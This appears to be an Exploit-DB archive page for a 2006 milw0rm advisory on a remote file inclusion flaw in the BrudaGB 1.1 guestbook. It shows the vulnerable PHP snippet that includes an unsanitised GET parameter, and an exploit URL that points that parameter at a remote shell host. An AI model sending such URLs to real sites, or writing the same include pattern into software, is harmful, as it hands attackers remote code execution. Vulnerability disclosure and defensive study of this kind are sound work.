Lucene search

K
exploitdbSHiKaAEDB-ID:2433
HistorySep 25, 2006 - 12:00 a.m.

BrudaGB 1.1 - '/admin/index.php' Remote File Inclusion

2006-09-2500:00:00
SHiKaA
www.exploit-db.com
46

AI Score

7.4

Confidence

Low

#==============================================================================================
#BrudaGB <= v1.1 (o) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://www.brudaswen.de      
#                                                                      
#Version : v1.1 & 1.0                                            
#                                                        
#================================================================================================
#
#Example : http://www.brudaswen.de/scripts/BrudaGB_v11/
#
#================================================================================================
#Bug in : admin/index.php
#
#Vlu Code :
#--------------------------------
 <?
 if($_GET[o] != "")
 {
 include($_GET[o].".php");
  }
 BrudaNews();
   ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/index.php?o=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]

AI Score

7.4

Confidence

Low

Related for EDB-ID:2433